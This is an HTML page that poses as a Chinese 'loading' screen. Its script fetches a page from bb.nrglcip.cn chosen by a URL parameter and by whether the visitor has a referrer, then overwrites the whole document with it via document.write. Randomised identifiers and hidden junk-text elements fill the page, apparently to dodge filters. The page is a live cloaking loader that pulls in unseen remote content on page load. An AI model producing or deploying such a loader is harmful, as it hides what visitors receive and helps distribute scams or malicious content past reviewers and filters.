<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .adMfMUY6H6n {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .adMfMUY6H6n .lOmm50UaW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .adMfMUY6H6n .content {
            line-height: 50px;
            text-align: center
        }

        .adMfMUY6H6n .img {
            width: 100%
        }

        .adMfMUY6H6n .Moi0UYWtFX {
            text-align: center
        }

        .adMfMUY6H6n .Moi0UYWtFX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .adMfMUY6H6n .Moi0UYWtFX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .adMfMUY6H6n .Moi0UYWtFX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .adMfMUY6H6n .Moi0UYWtFX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .adMfMUY6H6n .Moi0UYWtFX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .adMfMUY6H6n .Moi0UYWtFX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .adMfMUY6H6n .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PfsmexqY16C0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UqlYxF = PfsmexqY16C0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UqlYxF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UqlYxF +".html?a=share";
		}
		
        zpuUOcFthj=url+"#"+new Date().getTime();
        zpuUOcFthj && function() {
            $.get(zpuUOcFthj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >WIO9dWzfkPqJzkjKCJkFqU23fdNn1sXsNOubhlQPDh4UsjMWpunPLC38Lv2bZiHA7h9tPdubIg9taC9J</li>
<a  href='#' style='display:none'>giw9cRlrYHhvgMSNz1</a>
<div style='display:none'>lO24pSrwiX8LgfiLRoN9UG2GY3ofsA8Dba1YwtTsRm3u5qX6ZL5CPvK3TqBglUTyCEnkAWyIj7FyYZdJ</div>
<p  style='display:none'>A3cQ6FbmXXdjvO1J6s66Gf0sTcAmY3zodTM8bRW4j1NJCdCsCyueuzT2ze7QVCTa8p3TE0szPM5cZmmqzqxXryp641e</p>
<li style='display:none' >WIO9dWzfkPqJzkjKCJkFqU23fdNn1sXsNOubhlQPDh4UsjMWpunPLC38Lv2bZiHA7h9tPdubIg9taC9J</li>
<a  href='#' style='display:none'>giw9cRlrYHhvgMSNz1</a><div class="adMfMUY6H6n">
    <div class="lOmm50UaW">
        <div class="Moi0UYWtFX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>QbYEyDEO87j0gTUgjzlcIi04sRUqnu7BTnxwJRjUEmWoJkQDGaJyK</p>
<span style='display:none'>uU9XbegdWuCsNXY9sOnNVq04YL1ZNHb38I7w</span>
<ul style='display:none' >KSIlgizWK8HvMtIlnAPxIletWjtX1wAS2QAOxfNZbbxqqz6g90lr8QQAD3kR2XC9uN0i6coy1iB5nDDnHZCffV</ul>
<b style='display:none' >ji7JQy5sH5d4YeGJMldpHAiYvxF4aW1JmtsI5</b>
<img  src='' style='display:none'></body>
</html>